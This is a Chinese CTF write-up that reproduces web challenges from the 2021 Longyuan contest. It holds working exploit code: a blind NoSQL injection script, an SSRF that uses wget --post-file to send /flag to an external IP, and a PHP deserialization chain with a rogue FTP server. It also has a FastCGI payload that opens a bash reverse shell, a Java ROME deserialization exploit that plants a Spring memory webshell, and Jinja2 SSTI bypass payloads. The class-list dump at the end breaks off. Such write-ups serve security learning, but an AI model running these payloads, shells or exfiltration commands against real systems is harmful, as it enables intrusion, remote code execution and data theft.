陇原战”疫”2021网络安全大赛
|
0
|
221
|
比赛

1452 字
|
42 分钟

陇原战"疫"2021网络安全大赛(复现)

官方wp:https://mp.weixin.qq.com/s/BaNpMsi6PKpe0aeuwiAvwg

CheckIN

审一波代码:

 db_table := conn.DB("ctf").C("users")
    result := User{}
    err = db_table.Find(bson.M{"$where":"function() {if(this.username == '"+username+"' && this.password == '"+password+"') {return true;}}"}).One(&result)

    if result.Username == "" {
        c.Header("Content-Type", "text/html; charset=utf-8")
        c.String(200, "<script>alert('Login Failed!');window.location.href='/login'</script>")
        return
    }

经典sql注入,直接一个二分脚本:

import requests

url = 'http://38d8abd7-d230-4000-976e-d5263de8b29c.node4.buuoj.cn:81/login'

result = ''
i = 0
while (1):
    left = 32
    right = 128
    while (1):
        mid = (left + right) // 2
        if left == right:
            result += chr(left)
            print(result)
            i += 1
            break
        temp = chr(mid)
        if temp == '\\':
            temp = '\\\\'
        payload = {
            "username": f"-1' || this.password[{i}] > '{temp}')return true; else if ('a' == 'b",
            "password": "123"
        }
        res = requests.post(url=url, data=payload).text
        if 'Pretend' in res:
            left = mid + 1
        else:
            right = mid
    if (right == 32):
        break
print('[*]Result ' + result)

然后拿密码直接登录admin。

func getController(c *gin.Context) {

    cmd := exec.Command("/bin/wget", c.QueryArray("argv")[1:]...)
    err := cmd.Run()
    if err != nil {
        fmt.Println("error: ", err)
    }

    c.String(http.StatusOK, "Nothing")
}

/wget明显有代码注入,而且


这里有post-file,那么需要一个ssrf来把flag传出来。

func proxyController(c *gin.Context) {

    var url Url
    if err := c.ShouldBindJSON(&url); err != nil {
        c.JSON(500, gin.H{"msg": err})
        return
    }

    re := regexp.MustCompile("127.0.0.1|0.0.0.0|06433|0x|0177|localhost|ffff")
    if re.MatchString(url.Url) {
        c.JSON(403, gin.H{"msg": "Url Forbidden"})
        return
    }

    client := &http.Client{Timeout: 2 * time.Second}

    resp, err := client.Get(url.Url)
    if err != nil {
        c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
        return
    }
    defer resp.Body.Close()
    var buffer [512]byte
    result := bytes.NewBuffer(nil)
    for {
        n, err := resp.Body.Read(buffer[0:])
        result.Write(buffer[0:n])
        if err != nil && err == io.EOF {

            break
        } else if err != nil {
            c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
            return
        }
    }
    c.JSON(http.StatusOK, gin.H{"data": result.String()})
}

虽然有黑名单,直接绕过就能ssrf了。由于传json,可以直接用unicode绕过。

{"url": "http://①27.0.0.1:8080/wget?argv[]=1&argv[]=--post-file&argv[]=/flag&argv[]=http://47.96.173.116:2333"}

eaaasyphp

给了一波源码,一个反序列化。看一波phpinfo,有php-fpm,估计要打。没想到可以反序列化数组,直接卡死了。反序列化payload:

<?php
class Esle{
}
class Bypass{
    public $str4;
    public function __construct($str4){
        $this->str4=$str4;
    }
}
class Welcome{
    public $username;
    public function __construct($username){
        $this->username=$username;
    }
}
class Bunny {
    public $filename;
    public function __construct($filename){
        $this->filename=$filename;
    }
}
$Bunny=new Bunny("ftp://root@47.96.173.116:23/aaaaa");
$Welcome=new Welcome($Bunny);
$Esle=new Esle();
$Bypass=new Bypass($Welcome);
echo urlencode(serialize(array($Esle,$Bypass)));

虽然说有file_put_contents,但是不能写文件,所以直接打phpfpm。用gopherus生成payload:


复制ip地址后面那串%00...然后vps起一个恶意ftp:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

fastcgi默认端口在9000。然后服务器监听,构造payload:

/?code=a%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Di%3A1%3BO%3A6%3A%22Bypass%22%3A1%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A31%3A%22ftp%3A%2F%2Froot%4047.96.173.116%3A23%2Faaa%22%3Bs%3A4%3A%22data%22%3BN%3B%7D%7D%7D%7D&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/47.96.173.116/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

即可反弹shell。

EasyJaba

审一波代码。

 @ResponseBody
  @RequestMapping({"/BackDoor"})
  public String BackDoor(@RequestParam(name = "ctf", required = true) String data) throws Exception {
    Object object1 = new Object(this);
    Object object = null;
    byte[] b = Tool.base64Decode(data);
    InputStream inputStream = new ByteArrayInputStream(b);
    BlacklistObjectInputStream ois = new BlacklistObjectInputStream(inputStream, (Set)object1);
    try {
      object = ois.readObject();
    } catch (IOException e) {
      e.printStackTrace();
    } catch (ClassNotFoundException e) {
      e.printStackTrace();
    } finally {
      System.out.println("information:" + object.toString());
    } 
    return "calm down....";
  }
}

明显一个java反序列化,看一波依赖:

<dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>

rome本来想直接开rua,但是有waf,而且靶机不出网,所以直接抄了一波guoke大佬的exp:https://guokeya.github.io/post/uTJmIcHXf/

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import org.apache.commons.io.FileUtils;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Base64;
public class Exp {
    public static void main(String[] args) throws Exception{
        // 生成恶意 bytecodes
        String code = "{printName();}";
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(test.class.getName());
        clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName()));
        clazz.makeClassInitializer().insertBefore(code);
        byte[][] bytecodes = new byte[][]{clazz.toBytecode()};
        File classFilePath = new File(new File(System.getProperty("user.dir"), ""), "test.class");
        FileUtils.writeByteArrayToFile(classFilePath, clazz.toBytecode());//用来生成内存马文件,从而写入字节码
        // 实例化类并设置属性
        TemplatesImpl templatesimpl = new TemplatesImpl();
        Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes");
        fieldByteCodes.setAccessible(true);
        fieldByteCodes.set(templatesimpl, bytecodes);
        Field fieldName = templatesimpl.getClass().getDeclaredField("_name");
        fieldName.setAccessible(true);
        fieldName.set(templatesimpl, "test");
        Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory");
        fieldTfactory.setAccessible(true);
        fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
        // 要通过2个objectbean才能达成触发条件
        ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl);
        //objectBean1.toString();
        // 输出base64后的序列化数据
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(objectBean1);
        byte[] sss = byteArrayOutputStream.toByteArray();
        out.close();
        String exp = Base64.getEncoder().encodeToString(sss);
        System.out.println(exp);
        //byte[] obj_byte = Base64.getDecoder().decode(exp);
        //InputStream inputStream = new ByteArrayInputStream(obj_byte);
        //ObjectInputStream obj = new ObjectInputStream(inputStream);
        //obj.readObject().toString();
    }
}

上面是触发ROME反序列化的exp。根据ROME 反序列化分析
学习了一波javassist生成动态字节码:Java 反序列化漏洞(8) – 解密 YSoSerial : CommonsCollections2 POP Chains

import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
public class test {
    public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException {
        String className = "com.lyzy.ctf.ezjaba.controller.cmdController";
        byte[] bytes = Base64Utils.decodeFromString("yv66vgAAADQAhwoAIABGCAA4CwBHAEgLAEkASggASwgATAoATQBOCgAMAE8IAFAKAAwAUQcAUgcAUwgAVAgAVQoACwBWCABXCABYBwBZCgALAFoKAFsAXAoAEgBdCABeCgASAF8KABIAYAoAEgBhCgASAGIKAGMAZAoAYwBlCgBjAGIHAGYHAGcHAGgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEALkxjb20vbHl6eS9jdGYvZXpqYWJhL2NvbnRyb2xsZXIvY21kQ29udHJvbGxlcjsBAAlwcmVIYW5kbGUBAGQoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0OylaAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABbwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAB2hhbmRsZXIBABJMamF2YS9sYW5nL09iamVjdDsBAARjb2RlAQANU3RhY2tNYXBUYWJsZQcAUwcAaQcAUgcAWQcAZwcAagcAawcAbAcAZgEACkV4Y2VwdGlvbnMBAApTb3VyY2VGaWxlAQASY21kQ29udHJvbGxlci5qYXZhDAAhACIHAGoMAG0AbgcAawwAbwBwAQAAAQAHb3MubmFtZQcAcQwAcgBuDABzAHQBAAN3aW4MAHUAdgEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMACEAdwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDAB4AHkHAHoMAHsAfAwAIQB9AQACXEEMAH4AfwwAgACBDACCAHQMAIMAIgcAaQwAhACFDACGACIBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAsY29tL2x5enkvY3RmL2V6amFiYS9jb250cm9sbGVyL2NtZENvbnRyb2xsZXIBAEFvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvSGFuZGxlckludGVyY2VwdG9yQWRhcHRlcgEAE2phdmEvaW8vUHJpbnRXcml0ZXIBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABBqYXZhL2xhbmcvT2JqZWN0AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoACEAHwAgAAAAAAACAAEAIQAiAAEAIwAAAC8AAQABAAAABSq3AAGxAAAAAgAkAAAABgABAAAACAAlAAAADAABAAAABQAmACcAAAABACgAKQACACMAAAG6AAYACQAAAK8rEgK5AAMCADoEGQTGAKEsuQAEAQA6BRIFOgYSBrgAB7YACBIJtgAKmQAiuwALWQa9AAxZAxINU1kEEg5TWQUZBFO3AA86B6cAH7sAC1kGvQAMWQMSEFNZBBIRU1kFGQRTtwAPOge7ABJZGQe2ABO2ABS3ABUSFrYAFzoIGQi2ABiZAAsZCLYAGacABRkGOgYZCLYAGhkFGQa2ABsZBbYAHBkFtgAdpwAFOgUDrASsAAEADwCmAKkAHgADACQAAABGABEAAAAKAAoACwAPAA0AFwAOABsAEAArABEASgATAGYAFQB8ABYAkAAXAJUAGACcABkAoQAaAKYAHACpABsAqwAdAK0AHwAlAAAAZgAKAEcAAwAqACsABwAXAI8ALAAtAAUAGwCLAC4ALwAGAGYAQAAqACsABwB8ACoAMAAxAAgAAACvACYAJwAAAAAArwAyADMAAQAAAK8ANAA1AAIAAACvADYANwADAAoApQA4AC8ABAA5AAAAOQAH/gBKBwA6BwA7BwA6/AAbBwA8/AAlBwA9QQcAOv8AGgAFBwA+BwA/BwBABwBBBwA6AAEHAEIBAQBDAAAABAABAB4AAQBEAAAAAgBF");
        //控制器的bytecode
        ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        method.invoke(classLoader, className, bytes, 0, bytes.length);
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
        adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
    }
}

上面是test.class的代码,内存马。学习了一波内存马原理:JavaWeb 内存马一周目通关攻略
上面是直接调用的defineClass来加载控制器的class文件,从而加载控制器,写入内存马

package com.lyzy.ctf.ezjaba.controller;
import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class cmdController  extends HandlerInterceptorAdapter {
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        String code = request.getParameter("code");
        if(code != null){
            try {
                java.io.PrintWriter writer = response.getWriter();
                String o = "";
                ProcessBuilder p;
                if(System.getProperty("os.name").toLowerCase().contains("win")){
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", code});
                }else{
                    p = new ProcessBuilder(new String[]{"/bin/sh", "-c", code});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next(): o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            }catch (Exception e){
            }
            return false;
        }
        return true;
    }
}

上面是控制器的源码。
然后请求/?code=cat /flag即可

MagicMail

先在服务器上开一个smtp的服务:

python3 -m smtpd -c DebuggingServer -n 0.0.0.0:2333

然后发送邮件到服务器上


根据接收数据可以发现有ssti注入

过滤了:

根据文章:以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用
可以找到利用姿势。
查找可以利用类:

{{()|attr("\x5f\x5fcl\x61ss\x5f\x5f")|attr("\x5f\x5fb\x61se\x5f\x5f")|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73e\x73\x5f\x5f")()}}

有很多

我们可以记下几个含有eval函数的类:
warnings.catch_warnings
WarningMessage
codecs.IncrementalEncoder
codecs.IncrementalDecoder
codecs.StreamReaderWriter
os._wrap_close
reprlib.Repr
weakref.finalize
......

由于python自带的smtpd模块有base64还带b和回车之类的多余字符,解base64比较麻烦,直接用了guoke大佬的smtp脚本:

import smtpd
import asyncore
import base64
from HTMLParser import HTMLParser
class CustomSMTPServer(smtpd.SMTPServer):

    def process_message(self, peer, mailfrom, rcpttos, data):
        re=data.split("Subject:")[1].split("\n")
        for f in re:
            try:
                print(HTMLParser().unescape(base64.b64decode(f)))
            except:
                pass

server = CustomSMTPServer(('0.0.0.0', 2333), None)

asyncore.loop()

需要python2运行。然后发现可用类:
根据上面提到的几个类,将得到的所有类找索引:

a = '''
<class 'type'
>, <class 'weakref'>, <class 'wea
kcallableproxy'>, <class 'weakproxy'&gt
;, <class 'int'>, <class 'bytearray&
#39;>, <class 'bytes'>, <class 'l
ist'>, <class 'NoneType'>, <class
 'NotImplementedType'>, <class 'traceba
ck'>, <class 'super'>, <class &#3
9;range'>, <class 'dict'>, <class
 'dict_keys'>, <class 'dict_values'
>, <class 'dict_items'>, <class '
dict_reversekeyiterator'>, <class 'dict_rev
ersevalueiterator'>, <class 'dict_reverseit
emiterator'>, <class 'odict_iterator'&g
t;, <class 'set'>, <class 'str'&
gt;, <class 'slice'>, <class 'static
method'>, <class 'complex'>, <cla
ss 'float'>, <class 'frozenset'>
, <class 'property'>, <class 'manage
dbuffer'>, <class 'memoryview'>, &lt
;class 'tuple'>, <class 'enumerate'
>, <class 'reversed'>, <class 'st
derrprinter'>, <class 'code'>, <c
lass 'frame'>, <class 'builtin_function
_or_method'>, <class 'method'>, <
class 'function'>, <class 'mappingproxy
'>, <class 'generator'>, <class &
#39;getset_descriptor'>, <class 'wrapper_de
scriptor'>, <class 'method-wrapper'>
, <class 'ellipsis'>, <class 'member
_descriptor'>, <class 'types.SimpleNamespac
e'>, <class 'PyCapsule'>, <class 
'longrange_iterator'>, <class 'cell&#39
;>, <class 'instancemethod'>, <class 
'classmethod_descriptor'>, <class 'meth
od_descriptor'>, <class 'callable_iterator&
#39;>, <class 'iterator'>, <class &#3
9;pickle.PickleBuffer'>, <class 'coroutine&
#39;>, <class 'coroutine_wrapper'>, <
class 'InterpreterID'>, <class 'Encodin
gMap'>, <class 'fieldnameiterator'>,
 <class 'formatteriterator'>, <class &#3
9;BaseException'>, <class 'hamt'>, &
lt;class 'hamt_array_node'>, <class 'ha
mt_bitmap_node'>, <class 'hamt_collision_no
de'>, <class 'keys'>, <class &#39
;values'>, <class 'items'>, <clas
s 'Context'>, <class 'ContextVar'&g
t;, <class 'Token'>, <class 'Token.M
ISSING'>, <class 'moduledef'>, <c
lass 'module'>, <class 'filter'>
, <class 'map'>, <class 'zip'&gt
;, <class '_frozen_importlib._ModuleLock'>,
 <class '_frozen_importlib._DummyModuleLock'&g
t;, <class '_frozen_importlib._ModuleLockManager&#
39;>, <class '_frozen_importlib.ModuleSpec'
>, <class '_frozen_importlib.BuiltinImporter&#3
9;>, <class 'classmethod'>, <class &#
39;_frozen_importlib.FrozenImporter'>, <class &
#39;_frozen_importlib._ImportLockContext'>, <cl
ass '_thread._localdummy'>, <class '_th
read._local'>, <class '_thread.lock'&gt
;, <class '_thread.RLock'>, <class '
_frozen_importlib_external.WindowsRegistryFinder'>
, <class '_frozen_importlib_external._LoaderBasics
'>, <class '_frozen_importlib_external.File
Loader'>, <class '_frozen_importlib_externa
l._NamespacePath'>, <class '_frozen_importl
ib_external._NamespaceLoader'>, <class '_fr
ozen_importlib_external.PathFinder'>, <class &#
39;_frozen_importlib_external.FileFinder'>, <cl
ass '_io._IOBase'>, <class '_io._BytesI
OBuffer'>, <class '_io.IncrementalNewlineDe
coder'>, <class 'posix.ScandirIterator'
>, <class 'posix.DirEntry'>, <class &
#39;zipimport.zipimporter'>, <class 'zipimp
ort._ZipImportResourceReader'>, <class 'cod
ecs.Codec'>, <class 'codecs.IncrementalEnco
der'>, <class 'codecs.IncrementalDecoder&#3
9;>, <class 'codecs.StreamReaderWriter'>
, <class 'codecs.StreamRecoder'>, <class
 '_abc_data'>, <class 'abc.ABC'>
, <class 'dict_itemiterator'>, <class &#
39;collections.abc.Hashable'>, <class 'coll
ections.abc.Awaitable'>, <class 'collection
s.abc.AsyncIterable'>, <class 'async_genera
tor'>, <class 'collections.abc.Iterable&#39
;>, <class 'bytes_iterator'>, <class 
'bytearray_iterator'>, <class 'dict_key
iterator'>, <class 'dict_valueiterator'
>, <class 'list_iterator'>, <class &#
39;list_reverseiterator'>, <class 'range_it
erator'>, <class 'set_iterator'>, &l
t;class 'str_iterator'>, <class 'tuple_
iterator'>, <class 'collections.abc.Sized&#
39;>, <class 'collections.abc.Container'&gt
;, <class 'collections.abc.Callable'>, <
class 'os._wrap_close'>, <class '_siteb
uiltins.Quitter'>, <class '_sitebuiltins._P
rinter'>, <class '_sitebuiltins._Helper&#39
;>, <class 'types.DynamicClassAttribute'&gt
;, <class 'types._GeneratorWrapper'>, <c
lass 'enum.auto'>, <enum 'Enum'>
, <class 're.Pattern'>, <class 're.M
atch'>, <class '_sre.SRE_Scanner'>, 
<class 'sre_parse.State'>, <class 's
re_parse.SubPattern'>, <class 'sre_parse.To
kenizer'>, <class 'operator.itemgetter'
>, <class 'operator.attrgetter'>, <cl
ass 'operator.methodcaller'>, <class 'i
tertools.accumulate'>, <class 'itertools.co
mbinations'>, <class 'itertools.combination
s_with_replacement'>, <class 'itertools.cyc
le'>, <class 'itertools.dropwhile'>,
 <class 'itertools.takewhile'>, <class &
#39;itertools.islice'>, <class 'itertools.s
tarmap'>, <class 'itertools.chain'>,
 <class 'itertools.compress'>, <class &#
39;itertools.filterfalse'>, <class 'itertoo
ls.count'>, <class 'itertools.zip_longest&#
39;>, <class 'itertools.permutations'>, 
<class 'itertools.product'>, <class &#39
;itertools.repeat'>, <class 'itertools.grou
pby'>, <class 'itertools._grouper'>,
 <class 'itertools._tee'>, <class 'i
tertools._tee_dataobject'>, <class 'reprlib
.Repr'>, <class 'collections.deque'>
, <class '_collections._deque_iterator'>, &
lt;class '_collections._deque_reverse_iterator'&g
t;, <class '_collections._tuplegetter'>, &l
t;class 'collections._Link'>, <class 'f
unctools.partial'>, <class 'functools._lru_
cache_wrapper'>, <class 'functools.partialm
ethod'>, <class 'functools.singledispatchme
thod'>, <class 'functools.cached_property&#
39;>, <class 're.Scanner'>, <class &#
39;warnings.WarningMessage'>, <class 'warni
ngs.catch_warnings'>, <class 'importlib.abc
.Finder'>, <class 'importlib.abc.Loader&#39
;>, <class 'importlib.abc.ResourceReader'&g
t;, <class 'contextlib.ContextDecorator'>, 
<class 'contextlib._GeneratorContextManagerBase&#3
9;>, <class 'contextlib._BaseExitStack'>
, <class 'tokenize.Untokenizer'>, <class
 'traceback.FrameSummary'>, <class 'tra
ceback.TracebackException'>, <class '_ast.A
ST'>, <class 'ast.NodeVisitor'>, &lt
;class '_sha512.sha384'>, <class '_sha5
12.sha512'>, <class '_random.Random'&gt
;, <class 'select.poll'>, <class 'se
lect.epoll'>, <class 'selectors.BaseSelecto
r'>, <class '_socket.socket'>, <c
lass 'datetime.date'>, <class 'datetime
.timedelta'>, <class 'datetime.time'&gt
;, <class 'datetime.tzinfo'>, <class &#3
9;urllib.parse._ResultMixinStr'>, <class 'u
rllib.parse._ResultMixinBytes'>, <class 'ur
llib.parse._NetlocResultMixinBase'>, <class &#3
9;calendar._localized_month'>, <class 'cale
ndar._localized_day'>, <class 'calendar.Cal
endar'>, <class 'calendar.different_locale&
#39;>, <class 'email._parseaddr.AddrlistClass&#
39;>, <class 'Struct'>, <class 'u
npack_iterator'>, <class 'string.Template&#
39;>, <class 'string.Formatter'>, <cl
ass 'email.charset.Charset'>, <class 'd
is.Bytecode'>, <class 'inspect.BlockFinder&
#39;>, <class 'inspect._void'>, <clas
s 'inspect._empty'>, <class 'inspect.Pa
rameter'>, <class 'inspect.BoundArguments&#
39;>, <class 'inspect.Signature'>, <c
lass '_weakrefset._IterationGuard'>, <class
 '_weakrefset.WeakSet'>, <class 'weakre
f.finalize._Info'>, <class 'weakref.finaliz
e'>, <class 'threading._RLock'>, &lt
;class 'threading.Condition'>, <class '
threading.Semaphore'>, <class 'threading.Ev
ent'>, <class 'threading.Barrier'>, 
<class 'threading.Thread'>, <class '
logging.LogRecord'>, <class 'logging.Percen
tStyle'>, <class 'logging.Formatter'&gt
;, <class 'logging.BufferingFormatter'>, &l
t;class 'logging.Filter'>, <class 'logg
ing.Filterer'>, <class 'logging.PlaceHolder
'>, <class 'logging.Manager'>, <c
lass 'logging.LoggerAdapter'>, <class '
textwrap.TextWrapper'>, <class '__future__.
_Feature'>, <class 'zlib.Compress'>,
 <class 'zlib.Decompress'>, <class '
_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decom
pressor'>, <class '_lzma.LZMACompressor&#39
;>, <class '_lzma.LZMADecompressor'>, &l
t;class 'zipfile.ZipInfo'>, <class 'zip
file.LZMACompressor'>, <class 'zipfile.LZMA
Decompressor'>, <class 'zipfile._SharedFile
'>, <class 'zipfile._Tellable'>, &lt
;class 'zipfile.ZipFile'>, <class 'zipf
ile.Path'>, <class 'pkgutil.ImpImporter&#39
;>, <class 'pkgutil.ImpLoader'>, <cla
ss 'pyexpat.xmlparser'>, <class 'plistl
ib.Data'>, <class 'plistlib.UID'>, &
lt;class 'plistlib._PlistParser'>, <class &
#39;plistlib._DumbXMLWriter'>, <class 'plis
tlib._BinaryPlistParser'>, <class 'plistlib
._BinaryPlistWriter'>, <class 'email.header
.Header'>, <class 'email.header._ValueForma
tter'>, <class 'email._policybase._PolicyBa
se'>, <class 'email.feedparser.BufferedSubF
ile'>, <class 'email.feedparser.FeedParser&
#39;>, <class 'email.parser.Parser'>, &l
t;class 'email.parser.BytesParser'>, <class
 'tempfile._RandomNameSequence'>, <class &#
39;tempfile._TemporaryFileCloser'>, <class &#39
;tempfile._TemporaryFileWrapper'>, <class '
tempfile.SpooledTemporaryFile'>, <class 'te
mpfile.TemporaryDirectory'>, <class 'pkg_re
sources.extern.VendorImporter'>, <class 'pk
g_resources._vendor.six._LazyDescr'>, <class &#
39;pkg_resources._vendor.six._SixMetaPathImporter'&gt
;, <class 'pkg_resources._vendor.six._LazyDescr&#3
9;>, <class 'pkg_resources._vendor.six._SixMeta
PathImporter'>, <class 'pkg_resources._vend
or.appdirs.AppDirs'>, <class 'pkg_resources
.extern.packaging._structures.Infinity'>, <clas
s 'pkg_resources.extern.packaging._structures.Negativ
eInfinity'>, <class 'pkg_resources.extern.p
ackaging.version._BaseVersion'>, <class 'pk
g_resources.extern.packaging.specifiers.BaseSpecifier&#39
;>, <class 'pprint._safe_key'>, <clas
s 'pprint.PrettyPrinter'>, <class 'pkg_
resources._vendor.pyparsing._Constants'>, <clas
s 'pkg_resources._vendor.pyparsing._ParseResultsWithO
ffset'>, <class 'pkg_resources._vendor.pypa
rsing.ParseResults'>, <class 'pkg_resources
._vendor.pyparsing.ParserElement._UnboundedCache'>
, <class 'pkg_resources._vendor.pyparsing.ParserEl
ement._FifoCache'>, <class 'pkg_resources._
vendor.pyparsing.ParserElement'>, <class 'p
kg_resources._vendor.pyparsing._NullToken'>, <c
lass 'pkg_resources._vendor.pyparsing.OnlyOnce'&g
t;, <class 'pkg_resources._vendor.pyparsing.pypars
ing_common'>, <class 'pkg_resources.extern.
packaging.markers.Node'>, <class 'pkg_resou
rces.extern.packaging.markers.Marker'>, <class 
'pkg_resources.extern.packaging.requirements.Requirem
ent'>, <class 'pkg_resources.IMetadataProvi
der'>, <class 'pkg_resources.WorkingSet&#39
;>, <class 'pkg_resources.Environment'>,
 <class 'pkg_resources.ResourceManager'>, &
lt;class 'pkg_resources.NullProvider'>, <cl
ass 'pkg_resources.NoDists'>, <class 'p
kg_resources.EntryPoint'>, <class 'pkg_reso
urces.Distribution'>, <class 'gunicorn.pidf
ile.Pidfile'>, <class 'gunicorn.sock.BaseSo
cket'>, <class 'gunicorn.arbiter.Arbiter&#3
9;>, <class 'gettext.NullTranslations'>,
 <class 'argparse._AttributeHolder'>, <c
lass 'argparse.HelpFormatter._Section'>, <c
lass 'argparse.HelpFormatter'>, <class &#39
